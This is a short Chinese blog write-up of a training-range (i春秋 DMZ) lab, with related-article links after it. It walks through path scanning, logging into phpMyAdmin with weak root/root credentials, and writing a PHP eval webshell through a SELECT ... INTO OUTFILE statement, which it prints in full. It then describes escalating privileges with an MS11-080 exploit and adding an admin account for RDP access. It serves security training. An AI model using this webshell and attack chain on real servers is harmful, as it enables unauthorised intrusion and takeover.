i春秋DMZ大型靶场实验(二)提权漏洞
拿到靶场 直接进行扫描 爆破路径php
发现 phpinfo, phpmyadmin 更具phpinfo 获取跟路径 也能够经过 sql
输入错路径爆出绝对路径blog
phpmyamin 弱口令登陆 root,root登录
sql 直接写一句话木马file
select '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php'select
菜刀链接 上传 ms11080.exe 提权 添加 90sec 用im
mstsc 直接远程登陆img
相关文章
- 1. i春秋DMZ大型靶场实验(二)提权漏洞
- 2. i春秋DMZ大型靶场实验(四)Hash基础
- 3. i春秋DMZ大型靶场实验(一)内网拓展
- 4. i春秋DMZ大型靶场实验(三)内网转发DMZ2
- 5. i春秋web-Test(海洋CMS漏洞)
- 6. xss存储型漏洞靶场实现
- 7. 反射型xss漏洞(DVWA靶场)
- 8. vulhub漏洞靶场搭建
- 9. 漏洞利用与提权(二):Linux漏洞利用与提权
- 10. i春秋-百度杯九月场-YeserCMS(cmseasy的UpdateXML注入漏洞)
- 更多相关文章...
- • MySQL BIT、BINARY、VARBINARY、BLOB(二进制类型) - MySQL教程
- • Hibernate整合EHCache实现二级缓存 - Hibernate教程
- • Kotlin学习(二)基本类型
- • JDK13 GA发布:5大特性解读
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
